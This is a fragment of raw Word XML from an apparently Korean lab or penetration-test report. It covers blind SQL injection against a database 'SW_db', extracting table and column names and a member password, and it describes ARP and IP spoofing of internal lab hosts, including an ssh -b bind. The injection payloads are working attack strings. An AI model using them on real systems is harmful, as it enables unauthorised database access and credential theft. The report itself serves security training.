        <w:t>lind SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B609F1" w:rsidRDefault="00B609F1" w:rsidP="00B609F1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434840" cy="685800"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="41" name="그림 41" descr="https://lh3.googleusercontent.com/g6KjBXbJbSzN95tO9TUWnXFvnAePXI-uQIQT4YbEubF4_69jDynAlV45SIUshmtTCJz0Lr0sltzxGxN9R3N8zvWentzBdAN82JJgxq5GFhoX_JCFljunHFSd2A6PwBLCNzqHrw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3.googleusercontent.com/g6KjBXbJbSzN95tO9TUWnXFvnAePXI-uQIQT4YbEubF4_69jDynAlV45SIUshmtTCJz0Lr0sltzxGxN9R3N8zvWentzBdAN82JJgxq5GFhoX_JCFljunHFSd2A6PwBLCNzqHrwFU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1B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szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Injection Vector </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040771B" w:rsidRDefault="0040771B" w:rsidP="0040771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1912620" cy="708660"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="42" name="그림 42" descr="https://lh3.googleusercontent.com/QGQHsAk9jAwVGvgQs-npQvwdYADd_QmJ0KQmD1e0NVvVgwshsz8x1mo0NKeqqWF78O_zH-u_gRKZshZcz6FHChfHaEpESr2qfr-EvyLo_eysyDHLXKB7iobeFu_0J7H3JvJ58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QGQHsAk9jAwVGvgQs-npQvwdYADd_QmJ0KQmD1e0NVvVgwshsz8x1mo0NKeqqWF78O_zH-u_gRKZshZcz6FHChfHaEpESr2qfr-EvyLo_eysyDHLXKB7iobeFu_0J7H3JvJ58DDO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529840" cy="655320"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="43" name="그림 43" descr="https://lh6.googleusercontent.com/TsMy-f9I2NpEArm3rZv_GnfLnbUR_QMWFUcGZStAlriivoGKzCX3zLlFZW6Dq8mikZPsYtVAxk8V9nmpRDRWaOyQzT6HRKlfOTy0LheRqcO8yR8YY-AtShAcTdL3VU-Qn2H7i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6.googleusercontent.com/TsMy-f9I2NpEArm3rZv_GnfLnbUR_QMWFUcGZStAlriivoGKzCX3zLlFZW6Dq8mikZPsYtVAxk8V9nmpRDRWaOyQzT6HRKlfOTy0LheRqcO8yR8YY-AtShAcTdL3VU-Qn2H7iOk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1B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lind SQL Injection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격을 통해 D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의 길이와 이름을 확인할 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040771B" w:rsidRDefault="0040771B" w:rsidP="0040771B">
      <w:pPr>
        <w:ind w:left="804"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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(select table_name from (select table_name from information_schema.tables where table_schema=’SW_db’ and table_type=’base table’ order by table_name limit 1) as vtable order by table_name desc limit 1))=5%23</w:t>
      </w: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(select table_name from (select table_name from information_schema.tables where table_schema='SW_db' and table_type='base table' order by table_name limit 1) as vtable order by table_name desc limit 1), 1, 1)=char(0x42)%23</w:t>
      </w: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(select table_name from (select table_name from information_schema.tables where table_schema=’SW_db’ and table_type=’base table’ order by table_name limit 1) as vtable order by table_name desc limit 1)=”board”%23</w:t>
      </w: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lastRenderedPageBreak/>
        <w:t>and length((select column_name</w:t>
      </w:r>
      <w:r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from (select column_name from information_schema.columns where table_name='board' order by column_name limit 1) as vtable order by column_name desc limit 1))=7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(select column_name from (select column_name from information_schema.columns where table_name='greet' order by column_name limit 1) as vtable order by column_name desc limit 1),1,1)=char(0x43)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(select column_name from (select column_name from information_schema.columns where table_name='board'\ order by column_name limit 1) as vtable order by column_name desc limit 1)=”content”%23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040771B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위 쿼리 문을 이용해 T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>able, Column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의 이름을 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040771B" w:rsidRDefault="0040771B" w:rsidP="0040771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732020" cy="510540"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="44" name="그림 44" descr="https://lh5.googleusercontent.com/DbNCB44fBsuTdZL1Te7mDQAu95q4kFLBwhLZJJQAs-2aX41Fh-EkMab3ollGTUnAC1pCfl2R9jmoUsu5p9-nP9TMvtfOLPWt22uB3dNwcX6D52W4krx-IshVVj7AKMylSiATkj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h5.googleusercontent.com/DbNCB44fBsuTdZL1Te7mDQAu95q4kFLBwhLZJJQAs-2aX41Fh-EkMab3ollGTUnAC1pCfl2R9jmoUsu5p9-nP9TMvtfOLPWt22uB3dNwcX6D52W4krx-IshVVj7AKMylSiATkjRO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1B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가 가지고 있는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의 길이 및 내용 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040771B" w:rsidRDefault="0040771B" w:rsidP="0040771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693920" cy="99871"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="45" name="그림 45" descr="https://lh5.googleusercontent.com/7zumQZIgOxYQcSPheNGTYRk3g61qV_QWRJGppoxvJ6KndlCrNFDkDxgZNzS8TeTIoaseHGts_lYlIVoJ532sjkq_1dxL5nrmbZjfwqRs0U1eOP-F44J7hhD4VLMPKt0RYpGUV4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5.googleusercontent.com/7zumQZIgOxYQcSPheNGTYRk3g61qV_QWRJGppoxvJ6KndlCrNFDkDxgZNzS8TeTIoaseHGts_lYlIVoJ532sjkq_1dxL5nrmbZjfwqRs0U1eOP-F44J7hhD4VLMPKt0RYpGUV4cZ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74" cy="1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(select pw from (select id,pw from member order by id limit 1) as vtable order by id desc limit 1))=6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(select pw from (select id,pw from member order by id limit 1) as vtable order by id desc limit 1), 1, 1)=char(0x42)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ass from (select id,pw from member order by id limit 1) as vtable order by id desc limit 1)=”hacker”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select pw from member where id =”hacker”)=6%23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040771B" w:rsidRP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select pw from member where id =”hacker”), 1, 1)=char(0x42)%23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040771B" w:rsidRDefault="0040771B" w:rsidP="0040771B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w from member where id =”hacker”)=”hacker”%23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040771B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비밀번호의 길이 및 내용 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040771B" w:rsidRDefault="0040771B" w:rsidP="0040771B">
      <w:pPr>
        <w:ind w:left="804"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0040771B" w:rsidRDefault="0040771B" w:rsidP="0040771B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 w:rsidRPr="0040771B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">네트워크 보안 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040771B" w:rsidRDefault="0040771B" w:rsidP="0040771B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40771B">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ARP Spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040771B" w:rsidRDefault="0040771B" w:rsidP="0040771B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32660" cy="1082040"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="46" name="그림 46" descr="https://lh3.googleusercontent.com/mmlQ9e4Zpmvq7gn_qPaiO1IeAOyjMZRjlcP8Ncxfrut7kRsIfoIVnFXVmENe7zaD4ESu5zOwbUQ_Po_Zz5fmiNyGCnnW0lLhxIQD6ZA9cX29AxcpoaHFJMCTT31wQDfgZsci4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mmlQ9e4Zpmvq7gn_qPaiO1IeAOyjMZRjlcP8Ncxfrut7kRsIfoIVnFXVmENe7zaD4ESu5zOwbUQ_Po_Zz5fmiNyGCnnW0lLhxIQD6ZA9cX29AxcpoaHFJMCTT31wQDfgZsci4cA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92680" cy="1112520"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="47" name="그림 47" descr="https://lh5.googleusercontent.com/b6HC5XTWIwxWknLCngUFSQX5y84z1PmQ87nBjcgnXN-fH_OiNhzam4H28xZXcCW5nXUpvB34kgw-sB6eJBLYbUYTbJOBh3l7mdv1OMsOHLRs9lvWJXuhoKjFn2tlHkVpDrYTTh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5.googleusercontent.com/b6HC5XTWIwxWknLCngUFSQX5y84z1PmQ87nBjcgnXN-fH_OiNhzam4H28xZXcCW5nXUpvB34kgw-sB6eJBLYbUYTbJOBh3l7mdv1OMsOHLRs9lvWJXuhoKjFn2tlHkVpDrYTThGU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1B" w:rsidRPr="00802FA8" w:rsidRDefault="0040771B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40771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격자가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경영기획부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네트워크에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침입해</w:t>
      </w:r>
      <w:r w:rsidRPr="0040771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> BT</w:t>
      </w:r>
      <w:r w:rsidRPr="0040771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>으로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Gate</w:t>
      </w:r>
      <w:r w:rsidR="00802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>way</w:t>
      </w:r>
      <w:r w:rsidRPr="0040771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에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자신이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경영관리부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직원</w:t>
      </w:r>
      <w:r w:rsidRPr="0040771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PC[10.10.20.10]</w:t>
      </w:r>
      <w:r w:rsidRPr="0040771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>이라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속이고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경영관리부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직원</w:t>
      </w:r>
      <w:r w:rsidRPr="0040771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PC</w:t>
      </w:r>
      <w:r w:rsidRPr="0040771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에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자신이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="00802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidR="00802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ateway</w:t>
      </w:r>
      <w:r w:rsidRPr="0040771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[10.10.20.254]</w:t>
      </w:r>
      <w:r w:rsidRPr="0040771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>라고</w:t>
      </w:r>
      <w:r w:rsidRPr="0040771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0040771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>속임</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00802FA8" w:rsidRPr="00802FA8" w:rsidRDefault="00802FA8" w:rsidP="0040771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802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/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원활하게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통신할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수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있도록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>orwarding</w:t>
      </w:r>
      <w:r w:rsidRPr="00802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을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해주고</w:t>
      </w:r>
      <w:r w:rsidRPr="00802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sniffing </w:t>
      </w:r>
      <w:r w:rsidRPr="00802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>시작</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00802FA8" w:rsidRDefault="00802FA8" w:rsidP="00802FA8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46960" cy="1363980"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="48" name="그림 48" descr="https://lh6.googleusercontent.com/zBA6bjQNj3QRJdc3SgXyxwvCsu01n-Ye6FDdjGv3-uWq3RTaamYPmew8MJjFheaBbv1iMPleMbbywNWU3b1eLmLAIebaAltbOqWMAYGTpFL4-3uk9eEB6Yy1mHZubvnqqLFUqh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lh6.googleusercontent.com/zBA6bjQNj3QRJdc3SgXyxwvCsu01n-Ye6FDdjGv3-uWq3RTaamYPmew8MJjFheaBbv1iMPleMbbywNWU3b1eLmLAIebaAltbOqWMAYGTpFL4-3uk9eEB6Yy1mHZubvnqqLFUqhww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16480" cy="1348740"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="49" name="그림 49" descr="https://lh6.googleusercontent.com/WwK3FWL8om61FfBk4Woqfe8B5hGxJmcVlOfFag7Vdi8yRStnYNYbgQ_a8W3WhuyeWM6nfeld48TxGy9G4_hMFwjJLxPv0krRlI82g_iDeyl613FDkzeX4Hxq2yoygX58K6g6rW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h6.googleusercontent.com/WwK3FWL8om61FfBk4Woqfe8B5hGxJmcVlOfFag7Vdi8yRStnYNYbgQ_a8W3WhuyeWM6nfeld48TxGy9G4_hMFwjJLxPv0krRlI82g_iDeyl613FDkzeX4Hxq2yoygX58K6g6rWNi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A8" w:rsidRPr="00802FA8" w:rsidRDefault="00802FA8" w:rsidP="00802FA8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802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격이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제대로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이루어졌는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확인하기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위해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에서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 xml:space="preserve"> Ping test</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00802FA8" w:rsidRPr="009321F3" w:rsidRDefault="00802FA8" w:rsidP="00802FA8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802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BT</w:t>
      </w:r>
      <w:r w:rsidRPr="00802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에서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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidRPr="00802FA8"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서로</w:t>
      </w:r>
      <w:r w:rsidRPr="00802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ping test</w:t>
      </w:r>
      <w:r w:rsidRPr="00802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>하는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것을</w:t>
      </w:r>
      <w:r w:rsidRPr="00802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sniffing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009321F3" w:rsidRDefault="009321F3" w:rsidP="009321F3">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009321F3" w:rsidRPr="009321F3" w:rsidRDefault="009321F3" w:rsidP="009321F3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9321F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>P Spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009321F3" w:rsidRDefault="009321F3" w:rsidP="009321F3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93620" cy="1455420"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="그림 1" descr="https://lh6.googleusercontent.com/7g-RS_cJ1W5rStuvTDslH8A751evu7P2aEDhh24TTXrJbHSAPZvDsER7_Pt66606N0Mco0BvDTdcCkpr1L5XJ5pf0tYqoeLN7EYbeJiNEaEGbAAeDfy4kubJ4vYvA_phYLSr9N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7g-RS_cJ1W5rStuvTDslH8A751evu7P2aEDhh24TTXrJbHSAPZvDsER7_Pt66606N0Mco0BvDTdcCkpr1L5XJ5pf0tYqoeLN7EYbeJiNEaEGbAAeDfy4kubJ4vYvA_phYLSr9N0Z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23160" cy="1455420"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="그림 9" descr="https://lh4.googleusercontent.com/6zFj_WYfSPaw0HjLZsP751HOsOOR1Y1gTZn36jqSe5Zl6147zjFehgo604nmQC2yWa8MEmCcCarMV_fzyfqzgOYVrLt6h4Z7GeIdykU2QwKpFUFOgAp2B0EDmFAQCYfmk4nXIC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6zFj_WYfSPaw0HjLZsP751HOsOOR1Y1gTZn36jqSe5Zl6147zjFehgo604nmQC2yWa8MEmCcCarMV_fzyfqzgOYVrLt6h4Z7GeIdykU2QwKpFUFOgAp2B0EDmFAQCYfmk4nXICKQ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9321F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">공격에 앞서 경영관리부 </w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">를 </w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>이용해</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[10.10.100.20]</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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접근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가능한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확인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539240"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="50" name="그림 50" descr="https://lh6.googleusercontent.com/8mvUWjpdEPLZeG4XzwcATJUwlNTv6h9CpoAMGsIEf7qI-s_2ylH6PfKiD9v-skmJEswWSsFnmK6YQx9_ro7Wy5nG3HmkiIcitnjM0nz08coCpj_5TWXL4p0HSTzWqSuQmZ_6f9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8mvUWjpdEPLZeG4XzwcATJUwlNTv6h9CpoAMGsIEf7qI-s_2ylH6PfKiD9v-skmJEswWSsFnmK6YQx9_ro7Wy5nG3HmkiIcitnjM0nz08coCpj_5TWXL4p0HSTzWqSuQmZ_6f9Wk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00300" cy="1546860"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="51" name="그림 51" descr="https://lh3.googleusercontent.com/NUptgCacT9FkhbQjiSFAvxJ_fQ9zDTQow-eS2nY0a9gNhAn_a4YJhSRZLMAnhgxQb4ZncB3-8Fg7OoKf0Ikpv26J6AYosk2eBfa5CFmOPfG4QwC2-2J1n5VeAqAlMoDXKGMDv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NUptgCacT9FkhbQjiSFAvxJ_fQ9zDTQow-eS2nY0a9gNhAn_a4YJhSRZLMAnhgxQb4ZncB3-8Fg7OoKf0Ikpv26J6AYosk2eBfa5CFmOPfG4QwC2-2J1n5VeAqAlMoDXKGMDvIT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ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에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[10.10.20.10]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의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주소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가상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인터페이스에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부여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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에게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자신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[10.10.20.10]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>라고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속임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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2362200" cy="1638300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="52" name="그림 52" descr="https://lh4.googleusercontent.com/MxmDO0FqGdhdHI3NWeFiBq1LtSPg8kJhkN7BLFXgEkuDG54aA0TW3vlZYCSRc5Hl0bOMlFDoBjsqBoJnFqSvNO_dPh6xcZwSXBzQO0Z-RyQwFBbwNhOSHfcYu3G8xFw-bp9K9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xmDO0FqGdhdHI3NWeFiBq1LtSPg8kJhkN7BLFXgEkuDG54aA0TW3vlZYCSRc5Hl0bOMlFDoBjsqBoJnFqSvNO_dPh6xcZwSXBzQO0Z-RyQwFBbwNhOSHfcYu3G8xFw-bp9K9HMR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301240" cy="1615440"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="53" name="그림 53" descr="https://lh5.googleusercontent.com/w-9Y5bBi1ZyOUhiYaZTnNhKc_vMVJyaAaEOWLRmhArYicj9iI0jVWQp7hd49khsAjXwz99A6rTCjTfvtbpX-9NW_TAJY7FYfygwFrKGKMtVHIqKZSpy6FJ2ns7VTubntS5Veev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-9Y5bBi1ZyOUhiYaZTnNhKc_vMVJyaAaEOWLRmhArYicj9iI0jVWQp7hd49khsAjXwz99A6rTCjTfvtbpX-9NW_TAJY7FYfygwFrKGKMtVHIqKZSpy6FJ2ns7VTubntS5Veevv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9321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BT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ssh –b </w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>옵션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용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가상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인터페이스에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부여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경영기획부</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PC[10.10.20.10] </w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>아이피</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>로</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[10.10.100.20]</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
